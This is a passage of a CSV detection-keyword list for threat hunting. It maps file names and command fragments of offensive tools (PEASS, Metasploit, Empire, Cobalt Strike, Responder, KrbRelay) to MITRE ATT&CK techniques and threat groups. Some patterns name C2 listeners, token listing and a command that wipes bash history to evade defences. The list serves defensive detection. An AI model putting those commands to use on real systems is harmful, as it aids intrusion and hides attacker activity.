Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_darwin_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_arm64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_darwin_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_fat.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_linux_386*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_linux_386*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_linux_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_linux_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_linux_arm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_linux_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linux_hostrecon*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*linux_hostrecon.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Linux_LPE_eBPF_CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*linux_sudo_cve-2017-1000367.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*linux_trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*LinuxARMLELF32.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*linux-exploit-suggester*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*linux-exploit-suggester*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*linux-exploit-suggester.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linuxprivchecker*","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","N/A","N/A","10","1344","483","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z" +"*linuxprivchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*linux-rds-exploit.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*linux-smart-enumeration.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linux-smart-enumeration-master*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*linWinPwn-*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*linWinPwn.*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lion2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lion2john-alt.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*LiquidSnake.exe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*list_backdoors*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*List_Privileges /Process:powershell*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*list_tcppivot*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*list_tokens -u*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" +"*ListAccountsWithSPN*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListAllUsers.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*ListDescriptionContainsPass*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListDomainAdmins*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListDomainGroupsLocalAdmin*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*listen(58082* '0.0.0.0'*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*listen_http 0.0.0.0 8080 *.php operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*ListMetasploitPayloads*","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ListNeverLoggedInAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListPasswordNeverExpire*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersLastPasswordChange*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersNoPasswordRequired*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersPasswordMustChange*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersPasswordNotChanged*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*litefuzz -lk -c*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz -s -a *","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz* -l -c*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz.py *","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz\fuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*lkarlslund/Adalanche*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*lklekjodgannjcccdlbicoamibgbdnmi*","greyware_tool_keyword","Anonymous Proxy Vpn Browser","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*llbhddikeonkpbhpncnhialfbpnilcnc*","greyware_tool_keyword","ProxyFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*llehsrewop*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*-llmnr -spn '*cifs* -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*LLMNR.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*LLMNRSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*llsrpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*lmhash*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*ln -sf /dev/null *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 